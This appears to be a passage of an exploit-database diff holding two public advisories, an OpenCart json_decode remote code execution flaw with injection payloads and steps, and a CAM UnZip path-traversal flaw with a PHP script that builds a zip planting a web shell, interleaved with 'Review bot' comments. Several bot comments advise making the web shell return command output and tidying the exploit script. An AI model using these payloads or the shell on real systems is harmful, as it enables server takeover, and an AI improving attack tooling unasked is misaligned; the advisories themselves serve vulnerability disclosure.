or exploits by the author or elsewhere.
hyp3rlinx
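Review bot: the iframe `<iframe name="ifrm" width="600" height="700" name="hidden-form"></iframe>` has two `name` attributes; the second is ignored by browsers, so drop it. The third form (`CSRF-PHP-INI`) omits the hidden `page` and `action` inputs that the first two send in the POST body and relies on the query string alone; either all three forms should carry them or none, and the text should say which of the two the application actually reads so readers know which parameters matter. The `action` attribute values are broken across lines around the URL; browsers strip that whitespace but the markup is clearer on one line. Given that `allow_url_include` switched to `On` turns any include of attacker-influenced input into remote code execution, the `Medium` severity deserves a sentence of justification.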

platforms/php/webapps/39679.txt Executable file

@ -0,0 +1,48 @@
OpenCart json_decode function Remote PHP Code Execution
Author: Naser Farhadi
Twitter: @naserfarhadi
Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
Vendor Homepage: http://www.opencart.com/
Vulnerability:
------------
/upload/system/helper/json.php
$match = '/".*?(?<!\\\\)"/';
$string = preg_replace($match, '', $json);
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
...
$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
$return = ($function) ? $function() : null;
...
return $return;
Exploit(json_decode):
------------
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"ok":"1"."2"."3"}'));
Real World Exploit(OpenCart /index.php?route=account/edit)
------------
go to http://host/shop_directory/index.php?route=account/edit
fill $_SERVER[HTTP_USER_AGENT] as First Name
/** save it two times **/
Code execution happens when an admin user visits the administration panel, in this example
admin user sees his user agent as your First Name in Recent Activity :D
Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
------------
if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
user information like extra phone number,... you can directly execute your injected code.
go to http://host/shop_directory/index.php?route=account/edit
fill {$_GET[b]($_GET[c])} as Custom Field value
save it
go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
Note:
------------
Exploit only works if PHP JSON extension is not installed.
Video: https://youtu.be/1Ai09IQK4C0
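Review bot: the advisory marks `$function = @create_function('', "return {$json};");` as the root of the problem, but the decisive defect is that the two `preg_replace` lines validate a stripped copy (`$string`, with every double-quoted literal removed by `'/".*?(?<!\\\\)"/'`) while `create_function` evaluates the original `$json`; a payload placed inside a quoted literal, such as `{"ok":"{$_GET[b]($_GET[c])}"}` or `"$_SERVER[HTTP_USER_AGENT]"`, is never inspected by the whitelist and is interpolated by PHP when the double-quoted literal is evaluated. Say that explicitly, and spell out the fix implied by `Exploit only works if PHP JSON extension is not installed.`: the fallback should never evaluate JSON as PHP code at all, so the helper should fail closed (or require ext/json) instead of calling `create_function`.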

platforms/windows/local/39680.txt Executable file

@ -0,0 +1,103 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt
Vendor:
=================
www.camunzip.com
Product:
==============
CAM UnZip v5.1
Vulnerability Type:
======================
Archive Path Traversal
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CAM UnZip fails to check that the paths of the files in the archive do not
engage in path traversal when uncompressing the archive files.
specially crafted files in the archive containing '..\' in file name can
overwrite files on the filesystem by backtracking or allow attackers
to place malicious files on system outside of the target unzip directory
which may lead to remote command execution exploits etc...
Tested successfully Windows 7
Exploit code(s):
===============
malicious archive script...
<?php
#CAM UnZip v5.1
#directory traversal to remote code execution exploit
#====================================================
if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php
exec($_GET["cmd"]); ?>');
$zip->close();
echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>
/////////////////////////////////////////////////////////////////////////////////////
Result:
Creating Folder: C:\Test\BOZO
Extracting Files From: C:\Test\BOZO.zip
Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28
1 file was Extracted.
C:\RCE.php
Exploitation Technique:
=======================
Local
Severity Level:
================
Medium
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx
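Review bot: `$res = $zip->open("$file_name.zip", ZipArchive::CREATE);` stores the result and never checks it, so a failed open falls through to `addFromString` and `close` silently; test `$res === true` and exit otherwise. `ZipArchive::CREATE` without `ZipArchive::OVERWRITE` appends to an existing archive of the same name, which can leave stale entries next to `RCE.php`. The entry name `"..\..\..\..\..\..\..\..\RCE.php"` relies on PHP leaving unknown escapes such as `\.` and `\R` untouched inside a double-quoted string, which is correct but easy to misread; a single-quoted string makes the intended backslashes obvious. The payload `exec($_GET["cmd"]);` discards the command output, so as written `RCE.php` gives blind execution only; echoing the result (or using `passthru`) would demonstrate it. Finally, the `Result:` block showing `Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php` is the actual evidence for the finding, so the description should state plainly that CAM UnZip does not normalise or reject `..` components in entry names before joining them to the output directory.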